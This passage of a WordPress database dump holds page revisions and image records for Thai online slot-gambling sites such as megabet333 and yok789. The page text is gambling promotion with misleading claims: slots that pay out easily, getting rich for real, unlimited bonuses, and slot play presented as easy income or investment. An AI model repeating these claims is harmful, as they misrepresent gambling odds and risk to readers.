06:22:28','',16,'https://megabet333.biz/?p=177',0,'revision','',0),(178,3,'2025-10-29 06:22:28','2025-10-29 06:22:28','<img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Slot_demo_play_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <a href=\"https://megabetauto.com/\" target=\"_blank\">\n ทดลองเล่นสล็อตฟรี คลิก!\n </a>\n <a href=\"https://amb18b.com/promotion/\" target=\"_blank\">\n โปรโมชั่นเกมสล็อต\n </a>\n <h1>ทดลองเล่นสล็อต รวมทุกค่ายเกมสล็อตแตกง่าย\n เว็บใหม่มาแรง API แท้ จาก USA</h1> <p data-start=\"354\" data-end=\"699\">การทดลองเล่นสล็อต megabet กำลังกลายเป็นเทรนด์ยอดฮิตในวงการเกมพนันออนไลน์ เพราะเป็นทางเลือกที่ดีที่สุดสำหรับผู้เล่นที่อยากสัมผัสความสนุกของเกมสล็อตแบบไม่ต้องเสียเงิน ทดลองเล่นสล็อตpgฟรี คือระบบที่เปิดให้คุณเข้าเล่นเกมได้ฟรีทุกค่าย ทุกเกม โดยไม่ต้องสมัครหรือฝากเงินก่อน เหมาะสำหรับมือใหม่ที่อยากฝึกฝีมือ รวมถึงสายปั่นสล็อตที่อยากลองสูตรใหม่ ๆ ก่อนลงสนามจริง เว็บสล็อตยุคใหม่อย่างเว็บตรง API แท้จาก USA กำลังมาแรงที่สุดในตอนนี้ เพราะมีระบบที่ทันสมัย ปลอดภัย และเชื่อมต่อกับผู้ให้บริการค่ายเกมโดยตรง ทำให้ผู้เล่นได้สัมผัสประสบการณ์เหมือนเล่นสล็อตในคาสิโนต่างประเทศแท้ ๆ ไม่ว่าจะเป็นภาพ เสียง หรืออัตราการแตกของโบนัส ทุกอย่างสมจริงและได้มาตรฐานระดับโลก ใครที่ยังไม่เคยลองถือว่าพลาดมาก เพราะนี่คือโอกาสทองในการเรียนรู้ระบบสล็อตก่อนลงเดิมพันจริง</p> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/PG_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Microgaming_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JILI_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/JOKER_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"314\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz.webp 314w, https://amb18b.com/wp-content/uploads/2025/10/Slot_xo_-_Megabet333-Biz-188x300.webp 188w\" sizes=\"(max-width: 314px) 100vw, 314px\" /> <img width=\"651\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz.webp 651w, https://amb18b.com/wp-content/uploads/2025/10/Pragmatic_-_Megabet333-Biz-300x230.webp 300w\" sizes=\"(max-width: 651px) 100vw, 651px\" />','ทดลองเล่นสล็อต','','inherit','closed','closed','','16-revision-v1','','','2025-10-29 06:22:28','2025-10-29 06:22:28','',16,'https://megabet333.biz/?p=178',0,'revision','',0),(183,3,'2025-12-16 06:45:34','2025-12-16 06:45:34','<a href=\"https://megabet333auto.net/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"http://megabet333auto.net\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://mgbline.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2025-12-16 06:45:34','2025-12-16 06:45:34','',32,'https://megabet333.biz/?p=183',0,'revision','',0),(186,3,'2026-01-05 03:06:50','2026-01-05 03:06:50','','ปั่น สล็อต ฟรี ทดลอง','','inherit','closed','closed','','1-spin-slot-free-demo-megabet333-biz','','','2026-01-05 03:06:57','2026-01-05 03:06:57','',0,'https://megabet333.biz/wp-content/uploads/2026/01/1-spin-slot-free-demo-Megabet333-Biz.webp',0,'attachment','image/webp',0),(189,3,'2026-01-05 03:09:30','2026-01-05 03:09:30','','เครดิต ฟรี ล่าสุด ไม่ ต้อง แชร์','','inherit','closed','closed','','2-latest-free-credit-no-sharing-required-megabet333-biz','','','2026-01-05 03:09:34','2026-01-05 03:09:34','',0,'https://megabet333.biz/wp-content/uploads/2026/01/2-Latest-free-credit-no-sharing-required-Megabet333-Biz.webp',0,'attachment','image/webp',0),(192,3,'2026-01-05 03:11:47','2026-01-05 03:11:47','','ทดลอง เล่น สล็อต ฟรี 88','','inherit','closed','closed','','3-demo-play-slot-free-88-megabet333-biz','','','2026-01-05 03:11:52','2026-01-05 03:11:52','',0,'https://megabet333.biz/wp-content/uploads/2026/01/3-Demo-play-slot-free-88-Megabet333-Biz.webp',0,'attachment','image/webp',0),(202,3,'2026-01-09 10:39:00','2026-01-09 10:39:00','','สล็อต แตก ง่าย จ่าย หนัก','','inherit','closed','closed','','8-slot-easy-jackpot-megabet333-biz','','','2026-01-09 10:39:06','2026-01-09 10:39:06','',0,'https://megabet333.biz/wp-content/uploads/2026/01/8-Slot-easy-jackpot-Megabet333-Biz.webp',0,'attachment','image/webp',0),(205,3,'2026-01-09 10:41:41','2026-01-09 10:41:41','','เว็บ สล็อต แตก ง่าย อันดับ 1','','inherit','closed','closed','','9-slot-no1-megabet333-biz','','','2026-01-09 10:41:45','2026-01-09 10:41:45','',0,'https://megabet333.biz/wp-content/uploads/2026/01/9-Slot-no1-Megabet333-Biz.webp',0,'attachment','image/webp',0),(212,3,'2026-01-12 14:16:47','2026-01-12 14:16:47','','สล็อตแตกง่าย ไม่มีขั้นต่ำ','','inherit','closed','closed','','12-no-minimum-amount-starting-from-just-1-baht-megabet333-biz','','','2026-01-12 14:16:52','2026-01-12 14:16:52','',0,'https://megabet333.biz/wp-content/uploads/2026/01/12-No-minimum-amount-starting-from-just-1-baht-Megabet333-Biz.webp',0,'attachment','image/webp',0),(216,3,'2026-01-13 13:13:46','2026-01-13 13:13:46','','สล็อตเว็บตรง','','inherit','closed','closed','','13-direct-slot-website-megabet333-biz','','','2026-01-13 13:13:52','2026-01-13 13:13:52','',0,'https://megabet333.biz/wp-content/uploads/2026/01/13-Direct-slot-website-Megabet333-Biz.webp',0,'attachment','image/webp',0),(222,3,'2026-01-15 10:50:59','2026-01-15 10:50:59','','สล็อตเว็บตรง 100 ต่างประเทศ','','inherit','closed','closed','','15-direct-slot-website-100-megabet333-biz','','','2026-01-15 10:51:03','2026-01-15 10:51:03','',0,'https://megabet333.biz/wp-content/uploads/2026/01/15-Direct-slot-website-100-Megabet333-Biz.webp',0,'attachment','image/webp',0),(226,3,'2026-01-16 13:05:13','2026-01-16 13:05:13','','ปัน โปร สล็อต','','inherit','closed','closed','','16-pro-slot-megabet333-biz','','','2026-01-16 13:05:17','2026-01-16 13:05:17','',0,'https://megabet333.biz/wp-content/uploads/2026/01/16-Pro-slot-Megabet333-Biz.webp',0,'attachment','image/webp',0),(230,3,'2026-01-17 12:32:01','2026-01-17 12:32:01','','สล็อต ซื้อ ฟรี ส ปิ น ทดลองเล่น','','inherit','closed','closed','','17-slot-games-buy-free-spins-demo-play-megabet333-biz','','','2026-01-17 12:32:05','2026-01-17 12:32:05','',0,'https://megabet333.biz/wp-content/uploads/2026/01/17-Slot-games-buy-free-spins-demo-play-Megabet333-Biz.webp',0,'attachment','image/webp',0),(238,3,'2026-01-20 15:34:43','2026-01-20 15:34:43','','ปั่น สล็อต ฟรี ทดลอง','','inherit','closed','closed','','19-spin-slot-free-demo-megabet333-biz','','','2026-01-20 15:34:47','2026-01-20 15:34:47','',0,'https://megabet333.biz/wp-content/uploads/2026/01/19-Spin-slot-free-demo-Megabet333-Biz.webp',0,'attachment','image/webp',0),(241,3,'2026-01-20 15:45:55','2026-01-20 15:45:55','','สล็อตออนไลน์','','inherit','closed','closed','','20-slot-online-megabet333-biz','','','2026-01-20 15:46:00','2026-01-20 15:46:00','',0,'https://megabet333.biz/wp-content/uploads/2026/01/20-Slot-online-Megabet333-Biz.webp',0,'attachment','image/webp',0),(244,3,'2026-01-21 12:54:04','2026-01-21 12:54:04','','สล็อตเว็บตรง วอลเล็ต','','inherit','closed','closed','','21-slot-online-wallet-megabet333-biz','','','2026-01-21 12:54:08','2026-01-21 12:54:08','',0,'https://megabet333.biz/wp-content/uploads/2026/01/21-Slot-online-wallet-Megabet333-Biz.webp',0,'attachment','image/webp',0),(249,3,'2026-01-22 16:13:36','2026-01-22 16:13:36','','เครดิตฟรี กดรับเอง ยืนยันเบอร์','','inherit','closed','closed','','22-credit-free-megabet333-biz','','','2026-01-22 16:13:40','2026-01-22 16:13:40','',0,'https://megabet333.biz/wp-content/uploads/2026/01/22-Credit-free-Megabet333-Biz.webp',0,'attachment','image/webp',0),(252,3,'2026-01-23 13:02:51','2026-01-23 13:02:51','','เครดิตฟรี รับหน้าเว็บ','','inherit','closed','closed','','23-credit-free-get-on-web-megabet333-biz','','','2026-01-23 13:02:58','2026-01-23 13:02:58','',0,'https://megabet333.biz/wp-content/uploads/2026/01/23-Credit-free-get-on-web-Megabet333-Biz.webp',0,'attachment','image/webp',0),(258,3,'2026-01-24 13:25:28','2026-01-24 13:25:28','','เครดิตฟรี สมาชิกใหม่','','inherit','closed','closed','','24-credit-free-new-member-megabet333-biz','','','2026-01-24 13:25:35','2026-01-24 13:25:35','',0,'https://megabet333.biz/wp-content/uploads/2026/01/24-Credit-free-new-member-Megabet333-Biz.webp',0,'attachment','image/webp',0),(260,3,'2026-01-24 13:28:27','2026-01-24 13:28:27','','เครดิตฟรี 50 ได้จริง','','inherit','closed','closed','','25-credit-free-50-megabet333-biz','','','2026-01-24 13:28:31','2026-01-24 13:28:31','',0,'https://megabet333.biz/wp-content/uploads/2026/01/25-Credit-free-50-Megabet333-Biz.webp',0,'attachment','image/webp',0),(268,3,'2026-02-23 01:15:20','2026-02-23 01:15:20','<a href=\"https://luca333auto.com/auth/register\" target=\"_blank\">\n สมัครสมาชิก\n </a>\n <a href=\"https://luca333auto.com/\" target=\"_blank\">\n เข้าสู่ระบบ\n </a>\n <a href=\"http://luca333line.com\" target=\"_blank\">\n ติดต่อเรา\n </a>','header','','inherit','closed','closed','','32-revision-v1','','','2026-02-23 01:15:20','2026-02-23 01:15:20','',32,'https://yok789ss.com/?p=268',0,'revision','',0),(271,3,'2026-02-24 05:12:33','2026-02-24 05:12:33','','YOK789 ปั่น สล็อต 1 บาท ทดลองเล่นฟรี แจกโบนัสทุกวัน','','inherit','closed','closed','','spin-slot-1baht-yok789','','','2026-02-24 06:23:07','2026-02-24 06:23:07','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Spin-slot-1baht-Yok789.webp',0,'attachment','image/webp',0),(272,3,'2026-02-24 05:12:35','2026-02-24 05:12:35','','YOK789 ปั่น สล็อต ฟรี ทดลอง แจกเทคนิคพารวย เหมาะกับมือใหม่','','inherit','closed','closed','','spin-slot-free-demo-yok789','','','2026-02-24 06:15:36','2026-02-24 06:15:36','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Spin-slot-free-demo-Yok789.webp',0,'attachment','image/webp',0),(273,3,'2026-02-24 05:12:37','2026-02-24 05:12:37','','Web slot hot bet1 - Yok789','','inherit','closed','closed','','web-slot-hot-bet1-yok789','','','2026-02-24 05:22:47','2026-02-24 05:22:47','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Web-slot-hot-bet1-Yok789.webp',0,'attachment','image/webp',0),(274,3,'2026-02-24 05:12:39','2026-02-24 05:12:39','','YOK789 เว็บสล็อตมาแรง เล่นแตกง่าย เบทขั้นต่ำ 1 บาท รวยได้จริง','','inherit','closed','closed','','true-wallet-yok789','','','2026-02-24 05:24:47','2026-02-24 05:24:47','',0,'https://yok789ss.com/wp-content/uploads/2026/02/True-wallet-Yok789.webp',0,'attachment','image/webp',0),(275,3,'2026-02-24 05:12:40','2026-02-24 05:12:40','','HBD Bonus Banner - Yok789','','inherit','closed','closed','','hbd-bonus-banner-yok789','','','2026-02-24 05:48:32','2026-02-24 05:48:32','',0,'https://yok789ss.com/wp-content/uploads/2026/02/HBD-Bonus-Banner-Yok789.webp',0,'attachment','image/webp',0),(276,3,'2026-02-24 05:12:41','2026-02-24 05:12:41','','lucky wheel Banner - Yok789','','inherit','closed','closed','','lucky-wheel-banner-yok789','','','2026-02-24 05:48:48','2026-02-24 05:48:48','',0,'https://yok789ss.com/wp-content/uploads/2026/02/lucky-wheel-Banner-Yok789.webp',0,'attachment','image/webp',0),(277,3,'2026-02-24 05:12:42','2026-02-24 05:12:42','','Reward 10_ Banner - Yok789','','inherit','closed','closed','','reward-10_-banner-yok789','','','2026-02-24 05:48:40','2026-02-24 05:48:40','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Reward-10_-Banner-Yok789.webp',0,'attachment','image/webp',0),(278,3,'2026-02-24 05:12:42','2026-02-24 05:12:42','','Slot NO1 - Yok789','','inherit','closed','closed','','slot-no1-yok789','','','2026-02-24 05:25:03','2026-02-24 05:25:03','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Slot-NO1-Yok789.webp',0,'attachment','image/webp',0),(279,3,'2026-02-24 05:12:43','2026-02-24 05:12:43','','Bonus free 100_ Banner - Yok789','','inherit','closed','closed','','bonus-free-100_-banner-yok789','','','2026-02-24 05:48:25','2026-02-24 05:48:25','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Bonus-free-100_-Banner-Yok789.webp',0,'attachment','image/webp',0),(280,3,'2026-02-24 05:12:44','2026-02-24 05:12:44','','Demo play slot Banner - Yok789','','inherit','closed','closed','','demo-play-slot-banner-yok789','','','2026-02-24 05:34:55','2026-02-24 05:34:55','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Demo-play-slot-Banner-Yok789.webp',0,'attachment','image/webp',0),(281,3,'2026-02-24 05:12:45','2026-02-24 05:12:45','','20 get 100 Banner - Yok789','','inherit','closed','closed','','20-get-100-banner-yok789','','','2026-02-24 05:48:13','2026-02-24 05:48:13','',0,'https://yok789ss.com/wp-content/uploads/2026/02/20-get-100-Banner-Yok789.webp',0,'attachment','image/webp',0),(282,3,'2026-02-24 05:12:47','2026-02-24 05:12:47','','79 get 200 Banner - Yok789','','inherit','closed','closed','','79-get-200-banner-yok789','','','2026-02-24 05:46:41','2026-02-24 05:46:41','',0,'https://yok789ss.com/wp-content/uploads/2026/02/79-get-200-Banner-Yok789.webp',0,'attachment','image/webp',0),(283,3,'2026-02-24 05:12:48','2026-02-24 05:12:48','','Yok789-loggo','','inherit','closed','closed','','yok789-loggo','','','2026-02-24 05:13:12','2026-02-24 05:13:12','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Yok789-loggo.webp',0,'attachment','image/webp',0),(284,3,'2026-02-24 05:12:49','2026-02-24 05:12:49','','pragmatic','','inherit','closed','closed','','pragmatic','','','2026-02-24 05:41:55','2026-02-24 05:41:55','',0,'https://yok789ss.com/wp-content/uploads/2026/02/pragmatic.webp',0,'attachment','image/webp',0),(285,3,'2026-02-24 05:12:51','2026-02-24 05:12:51','','Slot xo','','inherit','closed','closed','','slot-xo','','','2026-02-24 05:41:47','2026-02-24 05:41:47','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Slot-xo.webp',0,'attachment','image/webp',0),(286,3,'2026-02-24 05:12:52','2026-02-24 05:12:52','','Microgaming','','inherit','closed','closed','','microgaming','','','2026-02-24 05:41:24','2026-02-24 05:41:24','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Microgaming.webp',0,'attachment','image/webp',0),(287,3,'2026-02-24 05:12:53','2026-02-24 05:12:53','','PG','','inherit','closed','closed','','pg','','','2026-02-24 05:41:15','2026-02-24 05:41:15','',0,'https://yok789ss.com/wp-content/uploads/2026/02/PG.webp',0,'attachment','image/webp',0),(288,3,'2026-02-24 05:12:54','2026-02-24 05:12:54','','Character 2 -','','inherit','closed','closed','','character-2','','','2026-02-24 05:31:32','2026-02-24 05:31:32','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Character-2-.webp',0,'attachment','image/webp',0),(289,3,'2026-02-24 05:12:56','2026-02-24 05:12:56','','Character 3 -','','inherit','','closed','','character-3','','','2026-02-24 05:12:56','2026-02-24 05:12:56','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Character-3-.webp',0,'attachment','image/webp',0),(290,3,'2026-02-24 05:12:57','2026-02-24 05:12:57','','icon512 - Yok789','','inherit','closed','closed','','icon512-yok789','','','2026-02-24 05:13:33','2026-02-24 05:13:33','',0,'https://yok789ss.com/wp-content/uploads/2026/02/icon512-Yok789.webp',0,'attachment','image/webp',0),(291,3,'2026-02-24 05:12:58','2026-02-24 05:12:58','','JILI','','inherit','closed','closed','','jili','','','2026-02-24 05:41:32','2026-02-24 05:41:32','',0,'https://yok789ss.com/wp-content/uploads/2026/02/JILI.webp',0,'attachment','image/webp',0),(292,3,'2026-02-24 05:12:59','2026-02-24 05:12:59','','JOKER','','inherit','closed','closed','','joker','','','2026-02-24 05:41:40','2026-02-24 05:41:40','',0,'https://yok789ss.com/wp-content/uploads/2026/02/JOKER.webp',0,'attachment','image/webp',0),(293,3,'2026-02-24 05:13:00','2026-02-24 05:13:00','','3icon - Yok789','','inherit','closed','closed','','3icon-yok789','','','2026-02-24 05:52:25','2026-02-24 05:52:25','',0,'https://yok789ss.com/wp-content/uploads/2026/02/3icon-Yok789.webp',0,'attachment','image/webp',0),(294,3,'2026-02-24 05:13:01','2026-02-24 05:13:01','','Character 1 -','','inherit','closed','closed','','character-1','','','2026-02-24 05:31:22','2026-02-24 05:31:22','',0,'https://yok789ss.com/wp-content/uploads/2026/02/Character-1-.webp',0,'attachment','image/webp',0),(295,3,'2026-02-24 05:13:17','2026-02-24 05:13:17','https://amb18b.com/wp-content/uploads/2026/02/cropped-Yok789-loggo.webp','cropped-Yok789-loggo.webp','','inherit','','closed','','cropped-yok789-loggo-webp','','','2026-02-24 05:13:17','2026-02-24 05:13:17','',283,'https://yok789ss.com/wp-content/uploads/2026/02/cropped-Yok789-loggo.webp',0,'attachment','image/webp',0),(297,3,'2026-02-24 05:13:33','2026-02-24 05:13:33','https://amb18b.com/wp-content/uploads/2026/02/cropped-icon512-Yok789.webp','cropped-icon512-Yok789.webp','','inherit','','closed','','cropped-icon512-yok789-webp','','','2026-02-24 05:13:33','2026-02-24 05:13:33','',290,'https://yok789ss.com/wp-content/uploads/2026/02/cropped-icon512-Yok789.webp',0,'attachment','image/webp',0),(299,3,'2026-02-24 05:31:35','2026-02-24 05:31:35','<img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/search_megabet_333_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <img width=\"500\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz.webp 500w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-300x300.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/79_Get_200_-_Megabet333-Biz-150x150.webp 150w\" sizes=\"(max-width: 500px) 100vw, 500px\" /> <h1>megabet333 ล็อกอินก็รับได้ แจกโบนัสไม่จำกัดปัง ๆ ระบบ VIP สุดพิเศษ</h1> <p>แค่ล็อกอินก็สนุกกับเราได้เลย <a href=\"https://amb18b.com/\"><b>megabet333 </b></a>พร้อมเงินโบนัสที่แจกให้แบบปัง ๆ ตอบโจทย์ทั้งความสนุกและความคุ้มค่าในเวลาเดียวกัน ออกแบบมาเพื่อตอบแทนผู้เล่นประจำอย่างแท้จริง ใครที่ชอบสะสมแต้ม เล่นต่อเนื่อง ระบบจะอัปเกรดระดับอัตโนมัติให้ทันที พร้อมรับสิทธิพิเศษเหนือใคร ทั้งโบนัสรายวัน โบนัสคืนยอดเสีย และกิจกรรมลับเฉพาะสมาชิก VIP เท่านั้น ไม่ว่าจะหมุนสล็อต หรือเล่นคาสิโนสดก็ได้รับสิทธิ์สะสมแต้มแลกของรางวัลแบบไม่อั้น อีกทั้งเรื่องความปลอดภัยเรายังจัดเต็มไม่แพ้ใคร ด้วยเทคโนโลยีป้องกันข้อมูลขั้นสูง การฝากถอนทำได้รวดเร็วผ่านระบบออโต้ รองรับทั้งธนาคารและวอลเล็ต เพิ่มความสะดวกให้กับผู้เล่นทุกกลุ่ม นอกจากนี้ทีมงานยังดูแลตลอด 24 ชั่วโมง พร้อมตอบคำถามทุกปัญหาอย่างมืออาชีพ</p> <h2>megabet333 3 วิธีล็อกอินเว็บสล็อตแตกง่าย อันดับ 1 เปิดเร็วไม่ต้องยื่นเอกสาร</h2> <p>ง่าย ๆ ล็อกกอินเร็ว เปิดยูสกับเราไม่ยาก <b>megabet333 </b>ออกแบบระบบล็อกอินให้ใช้งานสะดวก ปลอดภัย และใช้เวลาไม่ถึงหนึ่งนาที ก็สามารถเริ่มเดิมพันได้ทันทีโดยไม่ต้องส่งเอกสารให้ยุ่งยากเหมือนเว็บทั่วไป สามารถดำเนินการง่าย ๆ แค่ 3 ขั้นตอนเท่านั้น โดยมีขั้นตอนดังต่อไปนี้ </p><ul><li><b>ล็อกอินผ่านเบอร์มือถือ </b>เพียงกรอกเบอร์โทรศัพท์ของคุณ ระบบจะส่งรหัส OTP เพื่อยืนยันตัวตนอย่างรวดเร็ว จากนั้นสามารถตั้งรหัสผ่านและเข้าสู่หน้าเกมได้ทันที เหมาะสำหรับผู้เล่นที่ต้องการความรวดเร็ว ปลอดภัย และไม่อยากจำข้อมูลซับซ้อน</li><li><b>ล็อกอินผ่านบัญชีอีเมลหรือโซเชียลมีเดีย </b>เปิดให้สมาชิกใหม่เชื่อมต่อบัญชีด้วยอีเมล หรือเข้าสู่ระบบผ่าน Facebook, Google หรือ Line ได้โดยตรง เรียกว่าแค่กดครั้งเดียวก็เข้าเล่นได้ทันที ไม่ต้องสมัครซ้ำให้เสียเวลา และยังสามารถใช้ระบบนี้ในทุกอุปกรณ์ทั้งมือถือและคอมพิวเตอร์</li><li><b>ล็อกอินอัตโนมัติผ่านระบบจำเครื่อง </b>สำหรับใครที่เล่นบ่อย ระบบจะจดจำข้อมูลการเข้าล่าสุดไว้แบบเข้ารหัส ปลอดภัยทุกครั้งที่กลับมา ไม่ต้องกรอกข้อมูลใหม่อีก ช่วยให้เริ่มเกมได้ไวกว่าเดิม เหมาะกับสายปั่นสล็อตที่ชอบความรวดเร็วต่อเนื่อง ท่านสามารถเข้าสนุกกับเราได้เลยโดยไม่ต้องเข้าหลาย ๆ รอบ หากเข้าเล่นกับเว็บของเราเป็นประจำเป็นอยู่แล้วก็สามารถเข้าและเริ่มต้นเดิมพันได้เลย </li></ul> <img width=\"1200\" height=\"500\" src=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp\" alt=\"\" srcset=\"https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz.webp 1200w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-300x125.webp 300w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-1024x427.webp 1024w, https://amb18b.com/wp-content/uploads/2025/10/Character_slot_1_-_Megabet333-Biz-768x320.webp 768w\" sizes=\"(max-width: 1200px) 100vw, 1200px\" /> <h2>เว็บสล็อตค่ายใหญ่ megabet333 โบนัสไม่จำกัด ขนให้รับแบบจัดหนักไม่มีคำว่าอั้นชัวร์</h2> <p>แจกให้จริง ๆ <b>megabet333 </b>ให้คุณรับโบนัสแบบไม่จำกัดได้เลย ขนทั้งความสนุกพร้อมข้อเสนอแบบไม่อั้นรับง่ายชัวร์เต็ม ๆ ขนความคุ้มค่ามาเสิร์ฟให้ผู้เล่นทุกคนแบบไม่มีลิมิต เริ่มตั้งแต่สมัครสมาชิกครั้งแรกก็รับได้ทันทีไม่ต้องลุ้นไม่ต้องรอแอดมินกดยืนยัน เพราะระบบออโต้ของที่นี่พร้อมแจกให้แบบเรียลไทม์เพียงล็อกอินเข้ามาก็มีโบนัสรออยู่ทุกวัน ไม่ว่าจะฝากเท่าไหร่ เล่นกี่รอบ หรืออยู่ในระดับสมาชิกใดก็สามารถเข้าร่วมโปรโมชั่นได้ทั้งหมด ไม่ต้องกลัวว่าจะหมดสิทธิ์หรือถูกจำกัดยอด โบนัสทุกแบบเปิดให้รับซ้ำได้ทุกวัน ทั้งโบนัสต้อนรับ โบนัสฝากรายวัน โบนัสคืนยอดเสีย รวมถึงกิจกรรมพิเศษในเทศกาลต่าง ๆ ที่จัดเต็มของรางวัลมูลค่าสูง ยิ่งเล่นยิ่งสะสมแต้มแลกรางวัลได้จริง ทั้งเครดิตเพิ่มของรางวัลพรีเมียมหรือสิทธิ์เข้าร่วมกิจกรรมพิเศษเฉพาะสมาชิกเท่านั้นเรียกได้ว่าทุกการเล่นของคุณมีค่าทุกวินาที</p> <h2>ดูแลระบบสมาชิกแบบ VIP ทีมงานพร้อมช่วยเหลือ ไม่มีเหวี่ยงแน่นอน </h2> <p>แน่นอนว่าความแตกต่างที่หลายคนอาจไม่รู้ของเว็บที่มีมาตรฐาน ระบบสมาชิก VIP ถูกออกแบบมาเพื่อให้ผู้เล่นได้รับสิทธิพิเศษเหนือใคร ยิ่งเล่นมาก ระดับสมาชิกก็จะสูงขึ้นตามระบบสะสมคะแนน และทุกระดับจะได้รับบริการเฉพาะตัว ไม่ว่าจะเป็นเจ้าหน้าที่ดูแลส่วนตัว โบนัสพิเศษรายเดือน หรือสิทธิ์เข้าร่วมกิจกรรมสุดเอ็กซ์คลูซีฟที่สมาชิกทั่วไปเข้าไม่ได้ อีกทั้งเรายังมีช่องทางติดต่อที่หลากหลาย ทั้งแชทสดในหน้าเว็บ <strong><a href=\"http://mgbline.com\" target=\"_blank\" rel=\"noopener\">Line Official</a></strong> และระบบช่วยเหลือผ่านแอปพลิเคชัน ทุกช่องทางตอบกลับไวภายในไม่กี่นาที ทีมงานอยู่ประจำตลอด 24 ชั่วโมง เพื่อให้ผู้เล่นมั่นใจได้ว่าไม่มีคำว่าปล่อยปัญหาทิ้งไว้ แม้แต่ผู้เล่นใหม่ที่ยังไม่คุ้นกับระบบก็ไม่ต้องกังวล เพราะทีมงานพร้อมแนะนำทุกขั้นตอน ตั้งแต่การสมัคร การฝากถอน ไปจนถึงการเลือกเกมที่เหมาะสมกับงบของคุณทุกอย่างให้คำตอบอย่างมืออาชีพ</p> <h2>สุดพิเศษ 3 ค่ายเกมน่าลอง กำเงินแค่สิบบาทก็ปั่นสล็อต\nลุ้นรวยได้เลย</h2> <p>แน่นอนว่าการสร้างรายได้หรือการลงทุนไม่ใช่เรื่องยากอย่างที่คิด เว็บของเรามีพันธมิตรที่จะทำให้ท่านได้เข้าถึงเกมต่าง ๆ ก่อนใคร แถมยังนำเสนอเกมใหม่ ๆ ที่เล่นสนุก แตกง่าย ไม่ต้องใช้เงินลงทุนสูงด้วย โดยมี 3 ค่ายเกมทำเงินที่น่าลุ้นดังต่อไปนี้ </p><h3><b>PG Slot</b></h3><p>ค่ายเกมที่ใคร ๆ ก็พูดถึงในวงการเว็บสล็อตคาสิโนต้องยกให้ pg Slot เพราะขึ้นชื่อเรื่องภาพกราฟิกสวย เพลงประกอบเร้าใจ และฟีเจอร์โบนัสที่ไม่เหมือนใคร 